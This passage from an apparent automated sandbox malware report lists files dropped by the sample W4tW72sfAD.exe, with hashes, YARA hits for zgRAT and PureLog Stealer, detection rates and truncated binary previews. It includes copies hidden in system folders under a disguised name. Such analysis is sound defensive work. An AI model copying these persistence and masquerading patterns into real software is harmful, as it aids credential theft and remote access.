                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, Author: Joe Security
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................... ...........@.....................................K.......p..................... ...................................................... ............... ..H............text....... ...................... ..`.rsrc...p...........................@....reloc........ .....................@..B........................H...........................H............................................0..........(3... ........8........E....*...........]...N...8%...*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....(+... ....~....{....:q...& ....8f.......0.......... ........8........E................J...>...8.......... ....8....~....:*... ....~....{ ...:....& ....8....r...ps....z*(.... .... .... ....s....(........ ....~....{....9g...& ....8\.......(....(.... ....?..

                                                                                                                                    C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe:Zone.Identifier

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                    C:\Program Files\Microsoft Office 15\ClientX64\9da3c047e935b1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with very long lines (681), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):681
                                                                                                                                    Entropy (8bit):5.897538285190348
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:hpyXVDUONcBNXmfui84xIqKQUNB9xExLU+pWojSBdgjG2uItNbOq2UUfkw3dUucw:ILxxlUNbxEBf1GzgaFQkuUd3xGCmW
                                                                                                                                    MD5:EDF5011B73DDC06EA24A0CD334C438B5
                                                                                                                                    SHA1:A7026A10113F6D336FB6C46731598822763A93DF
                                                                                                                                    SHA-256:7DC2537D767C8468C086D14B7D65A6B3FB31777FC5592BADC97A00947B3CE4F4
                                                                                                                                    SHA-512:36B53B762651913727B6B99DCC24C4AFF7754C274D6D2CD536C5F43E04024870B842E0D8718E4257C608D71EB8B83DC52E556990EAD8DA34307D573C2DBBCB75
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:MgwowKNyskc92P0ZlQEfKWjVl8nFZEr7oqjDqbbJsNljR9xA7pO9huf07bDygHZo3eULpxsJz5x7u9EmKmHu0ra3KsFPYnmky7qxplVK6FKl7hF8Wan49oyLDaB6scvLSMJxTQ7iQ7xuhy6mnH279rkJJetOkZbdT8TuYRoGdFnC0DnOdYTljxMll9oyhs71gUbjfMNVcwe3DiSF1euMF03gwrIZm0iuIwfglEsRK7IxTSiDri7C8vvpa4wyEysmNtvRCvewvdBIsGNdJFrE2gwXA0GrR4NVPfjkgQA5ELQftn7TrSo8Gotr6YQMowe1Pq2Mhm62Ew9rPRnW3x99POOkw1nIAxQSqZPCuuwEVw3UpCcpu3T1xflBbSap9y2RfrA0BlmIA4ndU45tZ8YGeYfLyOlcUGFh3my8BmnJRL122HqhWqQBawxGLzBx9Jx4zFksF7sxUOyThmTqhDGo0DHHzswMkzJIX6Cwh8cY8cqL8dijfVP5CJEv8c2XLfNfFp5lkhIjlrqXX5IVJNqPjNFO2QxEFFNcPLGSi788MqTVcqYDUhN8z852jqsTtEdgdNHMzzwLOrC33uvM2uui1PmRQOt1PoOINx1OiMOeuCtH5B8z5gb9T4pOl05lG55jd4qG2gnpfPyzgfVOP36tMOySHnnsQmXyGJoAV26Y2

                                                                                                                                    C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2079744
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    MD5:9026338FCE277581062754CAB87462E7
                                                                                                                                    SHA1:191B8D92C18B84FDEF03F691583D8B89598CB7DA
                                                                                                                                    SHA-256:5565710131F195B46FB7C0B124D16DF72EC5E0AAFDD22590EAFF7885AEAD636F
                                                                                                                                    SHA-512:8BE58979EEC71FE69408AA621E756D76B58DB496DA456DAD533FB88AD800ECF8D8E5933BAEDDA4742C1DC4E5095F8FE7C3071F0339B056F54A378ADB08908FCA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................... ...........@.....................................K.......p..................... ...................................................... ............... ..H............text....... ...................... ..`.rsrc...p...........................@....reloc........ .....................@..B........................H...........................H............................................0..........(3... ........8........E....*...........]...N...8%...*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....(+... ....~....{....:q...& ....8f.......0.......... ........8........E................J...>...8.......... ....8....~....:*... ....~....{ ...:....& ....8....r...ps....z*(.... .... .... ....s....(........ ....~....{....9g...& ....8\.......(....(.... ....?..

                                                                                                                                    C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe:Zone.Identifier

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x4bf9faa4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1310720
                                                                                                                                    Entropy (8bit):0.4221619743931657
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                                                    MD5:81AC2D5E03E90A887B7956BB62A450C5
                                                                                                                                    SHA1:D1DFFB20A6167E9393E543A81C590907FC6C78B1
                                                                                                                                    SHA-256:0C8A0E0D489BC02BF54CA594AA77000C84DC64D93D40B9F43EB7FDC27E7BEC6F
                                                                                                                                    SHA-512:92877750BCDF1A04FA10AFD4508B055393FA292AE4CEF2DFE2A88343B263983CF72041E9571FC453D54B115019EBDDF4F9BEB35762CC7B8DC6175B7FB8A9F000
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:K...... .......A.......X\...;...{......................0.!..........{A.#*...|y.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................t.m.#*...|..................]..o#*...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Recovery\9da3c047e935b1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):84
                                                                                                                                    Entropy (8bit):5.067812887467078
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:JQvAo43kqD54ogkfd3pPUJKczRKIOR26EQrn:evAo8rg+JwKCRSVr
                                                                                                                                    MD5:1AEAF6114CB060B06A50C30AB0D9E798
                                                                                                                                    SHA1:5593B70DEE931E7C25105DEA254920B3B177A966
                                                                                                                                    SHA-256:9E75F9C9CD9C866ADEB7267C15EF5853D56869AFEF7EE0E5A7EA25F7DD084B59
                                                                                                                                    SHA-512:9E69D895B33CCA0E28C16896BA959F3060601DAB94CB5475840CB31C8BF4B35B61CD48E1CF2383AD605EAAA5DC3B5BE3763F91CE74BF168045071E8595A658EE
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:7qKkZuw56GOvutFMhOycAOcqVpFaMKAQIdy5Ny6YxYCoWmNmq8xTTTDtOdOuoVtvF7mQ4J8tSapmMxTtcduN

                                                                                                                                    C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2079744
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    MD5:9026338FCE277581062754CAB87462E7
                                                                                                                                    SHA1:191B8D92C18B84FDEF03F691583D8B89598CB7DA
                                                                                                                                    SHA-256:5565710131F195B46FB7C0B124D16DF72EC5E0AAFDD22590EAFF7885AEAD636F
                                                                                                                                    SHA-512:8BE58979EEC71FE69408AA621E756D76B58DB496DA456DAD533FB88AD800ECF8D8E5933BAEDDA4742C1DC4E5095F8FE7C3071F0339B056F54A378ADB08908FCA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................... ...........@.....................................K.......p..................... ...................................................... ............... ..H............text....... ...................... ..`.rsrc...p...........................@....reloc........ .....................@..B........................H...........................H............................................0..........(3... ........8........E....*...........]...N...8%...*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....(+... ....~....{....:q...& ....8f.......0.......... ........8........E................J...>...8.......... ....8....~....:*... ....~....{ ...:....& ....8....r...ps....z*(.... .... .... ....s....(........ ....~....{....9g...& ....8\.......(....(.... ....?..

                                                                                                                                    C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe:Zone.Identifier

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                    C:\Users\Default\9da3c047e935b1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with very long lines (704), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):704
                                                                                                                                    Entropy (8bit):5.890852340568357
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:rqwJMZQUdTHVAmaEpa8HE8zk7isWZ0wROk11g0RMRrrwue72oyB:rq8/ITHVx7M8zkvDwdg0RMzemB
                                                                                                                                    MD5:45B4D9A34798786259052634A511A766
                                                                                                                                    SHA1:B45D045BA7A43AA0CAAAE8D3146023758EE082F6
                                                                                                                                    SHA-256:83E7FA937FC79539B8981CA3362C3352F443E42AF6A7D97503DF959A84DB44DF
                                                                                                                                    SHA-512:1E87A1698EEFD33584088A3D734CAA39DFB5BCD02F492D645794D3B5D95D848BEB29B4B9F36C1FA7848F5A89EB5AD95FB759042C6C539FF9E9C98CFC7F83F23A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:VM9MWOGX8P25Y229sW0V2W7h0auuMQ5hNjQKz3wa473qf7XlLGHVPJy9PbW6dWLsUVrzlrKyjaa5dQB2DJiGIjSEuR5Yh06hwLWKQh9e5Swys3f8Zd2TyEjuCmFUvvRsd2IR41mfKDK0xdW1w79E7ntsmlHocptKBDUzvODh1XIu3s7jQOixwNu0IZpTt8DfUAytIgFi3bMke9y3niXOH5XySeqViux2Tna34OatI94VAKWJlwpLkzYYmAao0u9InTR1i59ZHoFHACxIIguwFmSeOBR3xv3YAwsq2ekpxQE5tRXkMSgT9NDBBxmhoFlWvrGOUHPn6E9yiWu7nrreOjYxsroF1DBrprKCKJPFD3X4NOcoCp37YGHLSTgmcJv2DRJ0MsweblbVMejdOADMKETik8t1nmm3He16FmcU3Ygwow9ytCYcGjs97kQN851y9iOrmnYlhsSvih3x95HkOJwhw28eWPW8hrwGhRLGnw5YQ6aZrcNCxQkzwq5uo3PRWUO0uxPstB7bOYQzbix3BTKQH7T1VbcuhnC6sko3MfTwTIkYaGSFGWPCJ7sxdYWSiM3kVUG144qgAY78W5bPIWnLY9wu11ZxJANGPACF9bLMptCvAubi7GKLjsMWiV9Ce2W9L0tW3VQqLbfp7AuHZ00D0BhgxpgncIrwWCjJAEplzdAHMhZhl2mnCTIKTNiN

                                                                                                                                    C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2079744
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    MD5:9026338FCE277581062754CAB87462E7
                                                                                                                                    SHA1:191B8D92C18B84FDEF03F691583D8B89598CB7DA
                                                                                                                                    SHA-256:5565710131F195B46FB7C0B124D16DF72EC5E0AAFDD22590EAFF7885AEAD636F
                                                                                                                                    SHA-512:8BE58979EEC71FE69408AA621E756D76B58DB496DA456DAD533FB88AD800ECF8D8E5933BAEDDA4742C1DC4E5095F8FE7C3071F0339B056F54A378ADB08908FCA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................... ...........@.....................................K.......p..................... ...................................................... ............... ..H............text....... ...................... ..`.rsrc...p...........................@....reloc........ .....................@..B........................H...........................H............................................0..........(3... ........8........E....*...........]...N...8%...*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....(+... ....~....{....:q...& ....8f.......0.......... ........8........E................J...>...8.......... ....8....~....:*... ....~....{ ...:....& ....8....r...ps....z*(.... .... .... ....s....(........ ....~....{....9g...& ....8\.......(....(.... ....?..

                                                                                                                                    C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe:Zone.Identifier

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                    C:\Users\Public\Downloads\9e8d7a4ca61bd9

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with very long lines (606), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):606
                                                                                                                                    Entropy (8bit):5.900612675596578
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:2FgSsn8ozx1Lzbdc/2SrafCrcNJud7HdOvm0W+lQt:wm8wWPOqrWY9Smx
                                                                                                                                    MD5:B5487304446382E0241C467350F1F428
                                                                                                                                    SHA1:C64F40F65C4F3475CEDE9427C1B34CC68B78AFB0
                                                                                                                                    SHA-256:3A1587FD04ADA1DAFC3DB374BAFA3E2E6C74970F8D4D3828A69CB4EEB7838A2C
                                                                                                                                    SHA-512:663CEA27766C6936C2D57FC19614F12BD7873DF673A50D5731A977FED5B2A17F9F7C214358C5011FFE196F8A2A761E9F4BCA4C7D2F9B84DFDD55B6F7CC313A4E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:GULONXBZTQQ9CjfDtD4ZzxgcxMP7WcOeG9wRcxFvJ33R6zlphq9PABvSytbBIDD0Cv2CwNl57IQ64Of7ljaqd8eFOedsWEnF0CPK6i2TFER1uzXjOdZinWXDRxySu3j3fLF29VACrGkYrnUYG4e2oFbdoL3JukiMeYWjtfj2cX0hw8WncZL0YqPZtlNxb1SGhY4SQvolUlaRO4rpzPrVYsxyJ60ISvblEu9XEDXrukgxQ8Ly4h8MJ7rzlGJU4gSiKyMe5Ulw29kyMAhLvBNuxPbHCKw83CwOR7mbvq3j5LTJW3mki8i3Siu5WEcvim2zNWhOXFZEIoym5SvJhLa4e35tNrFrOHBTTd6AVYNcjevotI9ETSOXM7VUayBpArzAmfTbVuxI77VAHQAFsBY53oGVIljhXic1ouCNzhsifFZOmUMKy569T3G8Z7TtLPvYfdVXOwPKS0ayO1sxZZtblciuoEy1O8WPTAtI9z5BqvqcdSthOfUvgUxC4ktK8Y6TdKeNIkykervzwFRVUQmtokt9NqNYGuCRzW9SxgZoqtRyi7QzTX0swNp2ae9bWaetodAZG8iy07C4T5aPaYEs4UflrG1Sg8

                                                                                                                                    C:\Users\Public\Downloads\RuntimeBroker.exe

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2079744
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    MD5:9026338FCE277581062754CAB87462E7
                                                                                                                                    SHA1:191B8D92C18B84FDEF03F691583D8B89598CB7DA
                                                                                                                                    SHA-256:5565710131F195B46FB7C0B124D16DF72EC5E0AAFDD22590EAFF7885AEAD636F
                                                                                                                                    SHA-512:8BE58979EEC71FE69408AA621E756D76B58DB496DA456DAD533FB88AD800ECF8D8E5933BAEDDA4742C1DC4E5095F8FE7C3071F0339B056F54A378ADB08908FCA
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\Downloads\RuntimeBroker.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Downloads\RuntimeBroker.exe, Author: Joe Security
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................... ...........@.....................................K.......p..................... ...................................................... ............... ..H............text....... ...................... ..`.rsrc...p...........................@....reloc........ .....................@..B........................H...........................H............................................0..........(3... ........8........E....*...........]...N...8%...*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....(+... ....~....{....:q...& ....8f.......0.......... ........8........E................J...>...8.......... ....8....~....:*... ....~....{ ...:....& ....8....r...ps....z*(.... .... .... ....s....(........ ....~....{....9g...& ....8\.......(....(.... ....?..

                                                                                                                                    C:\Users\Public\Downloads\RuntimeBroker.exe:Zone.Identifier

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    File Type:CSV text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):847
                                                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\W4tW72sfAD.exe.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1799
                                                                                                                                    Entropy (8bit):5.370158927802367
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1H6HNp51qHGIs0HKD:iqbYqGSI6oPtzHeqKktVatp5wmj0qD
                                                                                                                                    MD5:7A6E8555AFA76BA984C7770574F2E66D
                                                                                                                                    SHA1:5ABEB64A4114833C1CAC45417883B8085E17E1B0
                                                                                                                                    SHA-256:A4FA0C6D687B4FCCD1C77657CFCBAC630CFCE48FBE530BD175DD06B3DB5FB5E9
                                                                                                                                    SHA-512:0F872399E40BC5FCF63956692CC70E4FDCD460BFE60CD0F6F7BD694CAEF8F87704846CA274E9F10114EC91C554CAD22E834BAAD38D50A4101E9DA9A4F5B6C14A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\juptXkyeRvGsIZrQGeVEsrnWhD.exe.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:CSV text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):847
                                                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                                                    Encrypted:false
